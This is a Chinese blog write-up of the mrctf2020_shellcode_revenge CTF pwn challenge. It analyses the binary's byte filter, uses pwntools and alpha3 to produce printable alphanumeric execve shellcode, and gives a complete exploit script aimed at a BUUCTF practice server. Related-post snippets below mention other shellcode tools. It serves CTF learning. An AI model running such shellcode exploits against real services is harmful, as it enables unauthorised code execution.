mrctf2020_shellcode_revenge

最新推荐文章于 2023-09-21 23:07:45 发布
最新推荐文章于 2023-09-21 23:07:45 发布
阅读量2.8k 收藏 2
点赞数 3
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122462681
版权

mrctf2020_shellcode_revenge

查看保护
请添加图片描述
请添加图片描述
只能看汇编,那就看一下吧,这个函数意思其实就是输入的长度大于0则中转到11ac。看一下11ac
请添加图片描述
给rbp-4的地方赋值为0,接着进123a
请添加图片描述
这个函数其实就是如果输入字符串长度大于0则跳转到11b8,否则call。这里放shellcode
请添加图片描述
不在0x60-0x7a跳转
请添加图片描述
0x40-0x5a
请添加图片描述
0x2f-0x5a
请添加图片描述
可以看到当0x60-0x70时不会跳转,0x2f-0x5a时不会跳转,输入shellcode的字符就应该保持在这个范围里即可。这里用到了alpha这个工具。

from pwn import *

context.arch='amd64'

shellcode = asm(shellcraft.sh())

f = open('z.bin', 'wb')

f.write(shellcode)
f.close()

生成一个shellcode到z.bin中,再通过alpha3将shellcode给变成可见字符

git clone https://github.com/TaQini/alpha3.git
python ALPHA3.py x64 ascii mixedcase rax --input='XXXXXXXX/z.bin'

最后exp

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25335)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = 'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

r.send(shellcode)

r.interactive()
z1r0.
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git...
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3688
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
mrctf2020_shellcode
K1ose的博客
04-21 589
拿到附件后,先file一下; 看到是个64bit的程序,拖到ida64里; 再checksec一下附件,看看保护情况; 栈没有保护,有可读可写可执行的段; 可以dbg调试一下,看看具体情况; 可以看到有一个段可读可写可执行,栈也确实没有什么保护; 现在去IDA分析一下程序; 变量参数如下 可以看到前几行在设置标准输入输出和错误; 接着输出"Show me your magic!"; 然后read一个400bytes的数据; 接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞执行任意命令。Shellcode在安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作...
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
mrctf2020_shellcode_revenge|wustctf2020_name_your_cat|2018_gettingStart|SUCTF_2018_stack|wustctf2020
weixin_46521144的博客
04-05 383
这五道题都异常简单。。。也不知道为啥 wustctf2020_number_game 这题大概是csapp第二章学好了直接连就可以了。 v1=Tmin=-2147483648即可。因为32位有符号整数下Tmin是1000_0000_0000_0000,取反码加上1还是Tmin 2018_gettingStart 好吧,这道题还是CSAPP第二章知识直接运用。有一个简单的溢出覆盖,其实是考察浮点的位表示,写个c程序跑一下就出来了 #include<stdio.h> int .
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3005
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
虎符CTF2022 —shellcode
最新发布
qq_54894802的博客
09-21 269
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
[MRCTF2020] - Web
qtL0ng的博客
07-01 1043
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
[MRCTF2020]你能看懂音符吗
weixin_52033041的博客
11-28 1741
[MRCTF2020]你能看懂音符吗 下载文件, 给你一个rar文件,发现打不开 拖进winhex查看,发现文件头错了 应该是Rar 进行修改 保存即可解压此文件 是一个word文件 看到这,并且题目提示音符,我就好奇思路是不是错了。。。。 其实不然,word第一时间想到的是隐藏文字 将隐藏文字选上,确定后发现word中多了一些音符 题目提示是音符,直接音符解密 解密网站:https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue 我发现我复制不了
关于利用alpha3生成可打印shellcode的报错的解决
Probeginner的博客
06-01 406
最开始python sc.py > shellcode执行这条语句老出错, 这后来又是winhex下载又是VMtool安装的,太麻烦的,最后机缘巧合,发现这样可以成功: 直接git clone 而后用python3而不是python2去运行sc.py而后直接 python ./ALPHA~~
BUUCTF WEB
qq_43633585的博客
09-28 399
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
[BUUCTF-pwn]——mrctf2020_shellcode
Y_peak的博客
03-19 298
[BUUCTF-pwn]——mrctf2020_shellcode 没开NX保护,发现F5不可以,就看汇编吧 这不就是相当于你写入shellcode然后执行嘛 exploit from pwn import * p=remote("node3.buuoj.cn",26104) context.arch='amd64' shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive() ...
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好的机器码程序,所以它可以绕过各种安全措施,不易被检测到,对系统造成更大的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值